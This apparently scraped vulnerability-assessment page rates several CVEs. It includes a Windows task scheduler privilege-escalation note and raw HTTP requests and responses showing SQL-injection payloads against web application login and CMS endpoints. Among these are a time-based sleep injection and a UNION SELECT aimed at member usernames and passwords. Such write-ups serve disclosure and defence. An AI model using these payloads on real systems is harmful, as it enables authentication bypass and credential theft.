1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-41511

Vendor

Description:

The username and password field of login in Lodging Reservation Management System V1 can give access to any user by using SQL injection to bypass authentication.
A malicious user can store a malicious payload into the accommodations app and can hijack the PHPSESSID, then he can use to hijack a login session.

Reproduce:

href

CVE Proof of Concept:

href

2

Now that this has been out and published a bit moe, we know that the bug here is that when an attacker uses the legacy task scheduler, the legacy task scheduler fails to impersonate the permissions of the user (as expected) and instead, simply runs it as itself- a local administrator. There’s a great writeput about it here: https://blog.0patch.com/2019/06/another-task-scheduler-0day-another.html
The TL;DR is that by invoking the legacy task scheduler on Windows 10 <= 1903 in the proper manner as an authenticated user, they can gain execution in the context of the scheduler itself (local administrator).

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-nu11-101821

Vendor

MySQL Request-1:

POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=IlZWXHcK@nu11secur1tycollaborator.net'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e

MySQL Response-1:

Response 1
HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:37 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7099
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Bootstrap core CSS -->


<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...
<b>Fatal error</b>: Uncaught Error: Call to undefined function mysql_error() in C:\xampp\htdocs\caiwl\include\accounts.php:28
Stack trace:
#0 C:\xampp\htdocs\caiwl\admin\login.php(165): User::userAuthentication('IlZWXHcK@burpco...', '0314337dea4e6aa...')
#1 {main}
thrown in <b>
...[SNIP]...

MySQL Request-2:

POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=ICpueGIm@nu11secur1tycollaborator.net''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e

MySQL Response-2

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:40 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6832
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Bootstrap core CSS -->


<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...

MySQL Request-3

POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=QXVzAYzI@nu11secur1tycollaborator.net'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e

MySQL Response-3

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:51 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6811
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Bootstrap core CSS -->


<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...

Reproduce

href

Proof:

href

1
Ratings
Technical Analysis

CVE-2021-41947

Description:

A SQL statement in request parameter vulnerability exists in Subrion CMS v4.2.1 in the visual-mode.
This application should not incorporate any user-controllable data directly into SQL queries.
Parameterized queries (also known as prepared statements) should be used to safely insert data into predefined queries.
In no circumstances should users be able to control or modify the structure of the SQL query itself?

MySQL Request:

GET /panel/visual-mode.json?get=access&type=blocks%27%20UNION%20ALL%20SELECT%20username,%20password%20FROM%20sbr421_members%20--%20-&object=landing_what_is_this&page=index HTTP/1.1
Host: 192.168.1.4
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0

MySQL Response:

HTTP/1.1 200 OK
Date: Sat, 16 Oct 2021 16:40:30 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Set-Cookie: INTELLI_c8e38fc98c=arfqsm98vhdqe3s8kod7nokh56; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: INTELLI_c8e38fc98c=arfqsm98vhdqe3s8kod7nokh56; expires=Sat, 16-Oct-2021 17:10:30 GMT; Max-Age=1800; path=/
Content-Length: 72
Connection: close
Content-Type: application/json

{"error":true,"message":"Action is forbidden.","code":403,"result":true}

Risk:

  • Medium

Reproduce:

href

Proof

href

1
Technical Analysis

This is now being exploited in the wild by the Necro botnet as was reported at https://securityaffairs.co/wordpress/123275/cyber-crime/necro-botnet-dvrs.html

1
Technical Analysis

This is now being exploited in the wild by the Necro botnet as was reported at https://securityaffairs.co/wordpress/123275/cyber-crime/necro-botnet-dvrs.html